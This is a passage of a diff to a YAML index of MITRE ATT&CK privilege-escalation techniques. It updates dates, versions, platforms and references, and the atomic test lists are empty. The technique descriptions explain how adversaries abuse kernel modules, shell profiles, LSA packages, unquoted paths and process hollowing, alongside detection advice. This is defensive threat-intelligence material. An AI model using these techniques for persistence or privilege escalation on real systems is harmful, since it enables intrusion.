-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -20714,7 +21028,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20740,12 +21054,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -20823,9 +21135,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -20892,7 +21203,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -20966,11 +21276,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -20987,7 +21296,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -20997,7 +21305,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21006,19 +21314,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -21066,11 +21372,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21138,23 +21445,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21217,11 +21523,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21274,8 +21579,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21323,78 +21628,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21442,6 +21680,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -21452,9 +21694,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -21463,8 +21709,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -21510,7 +21815,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21535,13 +21840,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21621,7 +21924,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -21657,7 +21959,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21680,12 +21982,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -21763,12 +22064,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21829,7 +22129,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -21873,7 +22172,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -21895,7 +22194,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -21976,7 +22274,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -21999,7 +22296,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -22029,12 +22326,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22119,7 +22414,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22184,7 +22478,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22259,7 +22552,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22287,7 +22580,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22318,7 +22610,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22361,12 +22653,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22383,7 +22673,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -22442,7 +22732,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -22524,12 +22813,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22626,7 +22914,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -22740,7 +23027,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -22810,7 +23096,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
